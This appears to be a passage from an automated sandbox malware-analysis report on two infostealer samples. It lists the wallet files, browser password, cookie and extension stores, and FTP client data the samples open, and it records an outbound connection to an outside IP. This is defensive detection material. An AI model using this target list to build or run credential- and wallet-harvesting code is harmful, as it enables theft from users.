Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\.*
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.8:49754 -> 94.156.102.239:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
